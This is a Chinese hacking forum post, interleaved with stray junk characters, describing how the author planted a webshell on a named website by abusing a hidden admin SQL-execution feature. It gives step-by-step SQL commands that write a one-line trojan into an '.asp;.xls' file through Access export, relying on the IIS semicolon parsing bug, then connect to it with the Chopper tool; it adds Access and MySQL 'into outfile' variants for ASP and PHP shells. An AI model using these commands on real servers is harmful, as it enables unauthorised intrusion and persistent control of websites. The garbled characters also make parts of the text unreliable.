好不容易进了后台,发现啥上传啊。备份啊多木有。
, m3 ^$ ^5 S+ u' v& ~" c6 c( [webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的0 @* t, w" u0 S, @
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
3 y) x2 B) N1 g然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
0 h" N# I- Y1 G1.create table cmd (a varchar(50))
9 T% f: L7 v7 E) d2.insert into cmd (a) values (‘‘)
' l5 `8 C' h7 h$ P6 O0 U3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
) A7 K. S. j2 B' W6 p8 r4 r. I(把表cmd的内容导出为物理路径的一个EXCEL文件)
1 c) p( h2 j: r- a1 s& s4.drop table cmd( C% r9 @ Y+ G6 M! a! b% f
利用IIS的BUG成功拿到了WEBSHELL。8 O& b3 S$ h2 h& M1 H# {
6 n8 h! Q" A% h6 {3 j+ Q直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话# p/ |. t! P9 [
+ [1 [) [& H0 p4 X SQL语句意思解释:
: ?( R3 C7 y) h& @+ a 第一句* M+ z2 a; ?) z4 i* B
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为508 c! i6 X4 G3 k" o6 X
$ I: F# H4 u7 z4 R' b) S3 t8 I 第二句# D6 X& {8 W+ b' ^5 L% F4 o
在表cmd的a字段插入一句话木马
! y& E- m8 b6 ^( F: C 第三句% U0 D- k$ F% g/ |/ n
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
}, Y' g6 e! ^
7 m9 i" v; }; j1 f 第四句% h7 _9 _' L; `* D! w
删除建立的cmd表
5 y: J6 Y$ x0 i
+ u5 T& O" G" J, u7 v; U 以下内容为测试:
% J) g7 A r6 H* N, I Access利用后台SQL执行命令功能导出WebShell:. u' ?; l% b9 H$ T4 H- J
这个更简单:% \2 ]6 [( K/ K+ x1 n0 d
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
* Z0 y) O4 o/ c$ d4 i6 @ 或者9 A4 {7 G1 |9 m- O
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]1 a' h6 x( c; P" f$ I, v" [
* E" L, f2 f8 A M% Y 后台有执行SQL语句功能(vote为已知表段)
1 Q& k' ]- u7 o+ e8 [1 v; M# z3 |$ V 希望对大家有所帮助拿shell的又一个思路
$ x) r, z( W8 |8 Z1 @ |